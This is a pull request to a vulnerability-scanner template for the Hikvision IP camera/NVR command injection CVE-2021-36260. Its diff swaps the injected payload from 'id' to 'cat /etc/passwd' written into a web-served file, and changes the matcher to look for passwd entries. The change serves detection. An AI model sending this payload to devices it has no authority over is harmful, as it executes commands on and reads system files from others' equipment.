### PR TITLE
Update CVE-2021-36260.yaml :: Suggestion to avoid FN

### DIFF
--- a/http/cves/2021/CVE-2021-36260.yaml
+++ b/http/cves/2021/CVE-2021-36260.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-36260
 
 info:
   name: Hikvision IP camera/NVR - Remote Command Execution
-  author: pdteam,gy741
+  author: pdteam,gy741,johnk3r
   severity: critical
   description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
   reference:
@@ -32,20 +32,15 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-        <?xml version="1.0" encoding="UTF-8"?><language>$(id>webLib/x)</language>
+        <?xml version="1.0" encoding="UTF-8"?><language>$(cat /etc/passwd>webLib/x)</language>
       - |
         GET /x HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true
+    matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - "contains(body_2,'uid=') && contains(body_2,'gid=')"
-          - "status_code_1 == 500 && status_code_2 == 200"
-        condition: and
-
-    extractors:
       - type: regex
+        part: body
         regex:
-          - "(u|g)id=.*"
+          - "root:.*:0:0:"


### PR DESCRIPTION
Hey,
I realized that the original template is not detecting the vulnerability when the payload is the string **'id'**. I changed the payload to **'cat /etc/passwd'** and got success. 

I performed the test using Python and the **'id'** payload did not work either.

Debugs for both paylods are attached.

![image](https://github.com/projectdiscovery/nuclei-templates/assets/6247648/de9b62ab-5756-483d-9694-0274f0d11b5e)

![image](https://github.com/projectdiscovery/nuclei-templates/assets/6247648/31a057a8-3c00-469e-9e8c-aa41f5659cfd)
[payloadcurrent.txt](https://github.com/projectdiscovery/nuclei-templates/files/12340710/payloadcurrent.txt)
[payloadnew.txt](https://github.com/projectdiscovery/nuclei-templates/files/12340711/payloadnew.txt)
